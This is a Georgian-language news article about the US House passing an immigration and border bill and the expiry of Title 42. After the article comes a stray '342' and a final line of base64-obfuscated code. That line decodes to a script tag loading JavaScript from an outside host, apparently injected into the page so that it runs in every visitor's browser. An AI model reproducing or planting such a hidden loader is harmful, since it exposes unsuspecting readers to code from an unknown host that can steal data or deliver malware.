celsiusi
ავერსი შნაიდერი

აშშ-ის წარმომადგენელთა პალატამ დაამტკიცა კანონპროექტი, რომელიც არალეგალური მიგრაციისა და საზღვრის კვეთით ნარკოვაჭრობის შეჩერებას ისახავს მიზნად. ახლა დოკუმენტს კენჭი უნდა უყაროს სენატმა, თუმცა რესპუბლიკელები ვარაუდობენ, რომ უმრავლესობაში მყოფი დემოკრატები მას მხარს არ დაუჭერენ.

კანონის მიღების შემთხვევაში, აშშ-ში თავშესაფრის მაძიებლების მიმართ მკაცრი შეზღუდვები ამოქმედდება და თავშესაფრისთვის განაცხადების წარდგენა შტატებს გარეთ ქვეყნებიდან იქნება შესაძლებელი. ასევე, განახლდება მექსიკის საზღვართან საზღვრის გამყოფი კედლის მშენებლობა.

აღსანიშნავია, რომ აშშ-ის ყოფილი პრეზიდენტის, დონალდ ტრამპის მიერ კოვიდპანდემიის დროს შემოღებული 42-ე განკარგულების მოქმედების ვადა დღეს ამოიწურა, რომლის დროსაც არალეგალი მიგრანტების აშშ-დან გაძევება გამარტივებული წესით და მოკლე ვადაში ხდებოდა. 42-ე განკარგულების ამოწურვასთან ერთად, ძალაში ბრუნდება მე-8 განკარგულება, რომელიც შედარებით მკაცრ საიმიგრაციო ზომებს ითვალისწინებს. მათ შორის, უკანონო კვეთის შემთხვევაში, ქვეყანაში ხელახლა შესვლაზე ხუთიდან ათ წლამდე შეზღუდვას.

42-ე განკარგულების მოქმედების ვადის ამოწურვის გამო აშშ-მექსიკის საზღვართან ბოლო პერიოდში სულ უფრო მეტი მიგრანტი იყრიდა თავს. აქ ბოლო ორ თვეში ყოველდღიურად საზღვრის გადაკვეთას ათი ათასზე მეტი ადამიანი ცდილობდა. 

342
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");